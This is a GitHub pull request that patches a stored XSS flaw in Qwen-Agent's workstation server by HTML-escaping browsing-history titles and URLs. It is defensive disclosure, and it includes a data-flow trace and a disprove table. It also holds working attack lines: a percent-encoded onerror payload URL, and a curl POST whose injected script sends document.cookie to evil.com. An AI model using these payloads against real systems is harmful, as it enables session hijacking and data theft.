fix: escape HTML in workstation browsing history to prevent stored XSS (CWE-79) by sebastiondev · Pull Request #846 · QwenLM/Qwen-Agent

sebastiondev · 2026-03-25T18:30:33Z

Vulnerability Summary

CWE-79: Stored Cross-Site Scripting (XSS) in qwen_server/workstation_server.py
Severity: High (stored XSS, no authentication required)

Data Flow

Source: Attacker-controlled url and title values are written to meta_data.jsonl via:
- database_server.cache_page() — unauthenticated POST to /endpoint (port 7866)
- workstation_server.add_file() — Gradio file upload
Sink: update_browser_list() (line ~162) interpolates these values directly into an HTML string using .format(), which is then rendered by Gradio's gr.HTML component.
No sanitization existed between source and sink.
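
The source-to-sink path above can be sketched end to end. This is a minimal illustration, not the project's code: the function names `cache_page_sketch` and `render_unescaped`, the record schema, and the `<a>` template are all assumptions made for the example. Only the overall shape (values written to `meta_data.jsonl`, then interpolated with `.format()`) comes from the description.

```python
import json
import os
import tempfile


def cache_page_sketch(path, url, title):
    # Source (hypothetical stand-in): append attacker-influenced values
    # to the JSONL store without any sanitization.
    with open(path, "a", encoding="utf-8") as f:
        f.write(json.dumps({"url": url, "title": title}) + "\n")


def render_unescaped(path):
    # Sink (hypothetical stand-in): read the records back and interpolate
    # them into an HTML string with .format(), as the vulnerable code did.
    rows = []
    with open(path, encoding="utf-8") as f:
        for line in f:
            rec = json.loads(line)
            rows.append('<a href="{}">{}</a>'.format(rec["url"], rec["title"]))
    return "\n".join(rows)


with tempfile.TemporaryDirectory() as tmp:
    store = os.path.join(tmp, "meta_data.jsonl")
    cache_page_sketch(store, "http://evil.com/", "<img src=x onerror=alert(1)>")
    rendered = render_unescaped(store)
```

Because the payload survives the round trip through the file unchanged, it reaches the HTML string as live markup, which is what makes the XSS "stored".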

Additionally, get_basename_from_url() URL-decodes percent-encoded characters, so a URL like http://evil.com/%3Cimg%20src=x%20onerror=alert(1)%3E produces the title <img src=x onerror=alert(1)>.
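
The decoding step can be reproduced with the standard library. The helper below is a hypothetical approximation of `get_basename_from_url()`, assuming it takes the last path segment and percent-decodes it; the real implementation may differ in detail.

```python
from urllib.parse import unquote, urlparse


def basename_from_url_sketch(url: str) -> str:
    # Assumed behavior: take the final path segment and percent-decode it.
    path = urlparse(url).path
    return unquote(path.rstrip("/").split("/")[-1])


url = "http://evil.com/%3Cimg%20src=x%20onerror=alert(1)%3E"
title = basename_from_url_sketch(url)
```

Under that assumption, `title` is the raw HTML payload even though the URL itself contains no angle brackets.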

Exploit Scenarios

Vector 1 — Chrome Extension (social engineering):

1. Attacker hosts a page at a URL containing a percent-encoded XSS payload.
2. Victim visits the page and clicks "Add to Qwen's Reading List" (the Chrome extension).
3. The extension sends the URL to database_server, which URL-decodes it and writes the result to meta_data.jsonl.
4. When the victim opens the Workstation, the payload renders via gr.HTML → XSS fires.

Vector 2 — Direct POST (network access required):

curl -X POST http://TARGET:7866/endpoint \
  -H "Content-Type: application/json" \
  -d '{"task":"cache","url":"<img src=x onerror=fetch(\"http://evil.com/steal?\"+document.cookie)>","content":"test"}'

Fix Description

Change: Added html.escape() calls for both url (with quote=True for attribute context) and title before HTML interpolation in update_browser_list().

Rationale:

- html.escape() is the standard Python library function for neutralizing HTML metacharacters: it always escapes <, >, and &, and also escapes " and ' when quote=True (the default)
- quote=True on the URL keeps the value from breaking out of the id="ck-..." and href="..." attributes
- The fix is minimal (1 new import, 3 changed lines) and does not alter any functional behavior
- No dependencies are added
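
A minimal sketch of the change, for illustration only. `ROW_TEMPLATE` and both function names are hypothetical; the actual markup built by update_browser_list() is not reproduced here, only the idea of escaping both values before `.format()`.

```python
import html

# Hypothetical row template; the real markup in update_browser_list() may differ.
ROW_TEMPLATE = '<li><input type="checkbox" id="ck-{url}"><a href="{url}">{title}</a></li>'


def render_row_unsafe(url, title):
    # Pre-fix behavior: raw values go straight into the HTML string.
    return ROW_TEMPLATE.format(url=url, title=title)


def render_row_escaped(url, title):
    # Post-fix behavior: escape both values before interpolation.
    return ROW_TEMPLATE.format(
        url=html.escape(url, quote=True),
        title=html.escape(title),
    )


payload = "<img src=x onerror=alert(1)>"
bad_url = 'http://evil.com/"><b>'
unsafe_row = render_row_unsafe(bad_url, payload)
safe_row = render_row_escaped(bad_url, payload)
```

In the escaped row, the double quote in `bad_url` becomes `&quot;`, so it can no longer terminate the `href` or `id` attribute.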

Diff: 1 file changed, 5 insertions, 2 deletions.

Test Results Summary

The fix was verified by tracing the code path:

- Before fix: x[0] and x[1] from meta_data.jsonl are interpolated directly into HTML → <img src=x onerror=alert(1)> renders as live HTML
- After fix: html.escape(x[0], quote=True) and html.escape(x[1]) convert < → &lt;, > → &gt;, and " → &quot;, so the payload renders as inert text
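
The same before/after comparison could also be checked mechanically rather than by tracing. The sketch below is one possible regression check, not part of the PR: it uses the standard library's `html.parser` to list the start tags a parser sees, and the `TagCollector` class and the `<a>` wrapper are assumptions made for the example.

```python
import html
from html.parser import HTMLParser


class TagCollector(HTMLParser):
    """Records the name of every start tag the parser encounters."""

    def __init__(self):
        super().__init__()
        self.tags = []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)


def parsed_tags(markup):
    collector = TagCollector()
    collector.feed(markup)
    collector.close()
    return collector.tags


payload = "<img src=x onerror=alert(1)>"
tags_before = parsed_tags('<a href="#">{}</a>'.format(payload))
tags_after = parsed_tags('<a href="#">{}</a>'.format(html.escape(payload)))
```

An `img` tag appears only in the unescaped variant; after escaping, the parser sees the payload as text inside the link.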

Disprove Analysis

We systematically attempted to invalidate this finding:

| Check | Result |
| --- | --- |
| Authentication | ❌ None. The `api_key` is for DashScope (LLM backend), not for user auth. Neither the Gradio nor FastAPI server authenticates clients. |
| Network binding | ⚠️ Default `127.0.0.1`, but `0.0.0.0` is documented and encouraged for multi-machine setups. Chrome extension path bypasses localhost restriction entirely. |
| CORS | ⚠️ Database server restricts CORS origins, but Chrome extensions and direct HTTP clients (curl) bypass CORS. |
| innerHTML script limitation | ⚠️ `<script>` tags don't execute via innerHTML per HTML5 spec, but event handlers (`onerror`, `onload`) DO execute. |
| Input validation | ❌ No `sanitize`, `escape`, `validate`, `clean`, or `allowlist` calls existed in the original code path. |
| Prior reports | ✅ Issue #810 reports the exact same XSS pattern in `gradio_utils.py`, confirming this is an acknowledged vulnerability class in the project. |
| Security policy | ❌ No `SECURITY.md` found. |
| Recent hardening | ❌ Only 2 commits on this file (original creation + this fix). No prior security work. |

Verdict: CONFIRMED VALID (high confidence)

No existing mitigation fully prevents exploitation. The Chrome extension attack vector bypasses both localhost binding and CORS restrictions, requires no special network access, and needs only a single click from the victim.

Known Limitations (for follow-up)

javascript: URI scheme: html.escape() does not prevent javascript: URIs in the href attribute. A URL-scheme allowlist would be a stronger defense.
Checkbox ID stability: After escaping, the id="ck-..." attribute uses the escaped URL, which may differ from the raw URL used elsewhere. This is a pre-existing design concern, not introduced by this fix.
Related issue: #810 describes the same XSS pattern in qwen_agent/gui/gradio_utils.py — that file is not addressed by this PR.
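
For the javascript: URI limitation listed above, a URL-scheme allowlist might look like the following. This is a sketch of a possible follow-up, not something this PR implements; `ALLOWED_SCHEMES` and `is_safe_link` are hypothetical names, and restricting links to http and https is an assumption about what the Workstation needs.

```python
from urllib.parse import urlsplit

# Assumption: only web links are expected in the browsing history.
ALLOWED_SCHEMES = {"http", "https"}


def is_safe_link(url: str) -> bool:
    # Reject anything whose scheme is not explicitly allowed, including
    # javascript:, data:, and scheme-less (relative) values.
    try:
        scheme = urlsplit(url.strip()).scheme.lower()
    except ValueError:
        return False
    return scheme in ALLOWED_SCHEMES
```

A check like this would complement html.escape() rather than replace it: escaping handles markup injection, while the allowlist handles URLs that are syntactically harmless but execute script when clicked.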

…d XSS (CWE-79) The update_browser_list() function interpolated title and url values from meta_data.jsonl directly into an HTML string without escaping. An attacker who controls a browsing entry title (via the browser extension or by writing to the meta_data file) could inject arbitrary HTML/JavaScript into the Gradio web UI. Fix: apply html.escape() to both title and url before interpolation into the HTML template string.

sebastiondev wants to merge 1 commit into QwenLM:main from sebastiondev:fix/cwe79-workstation_server
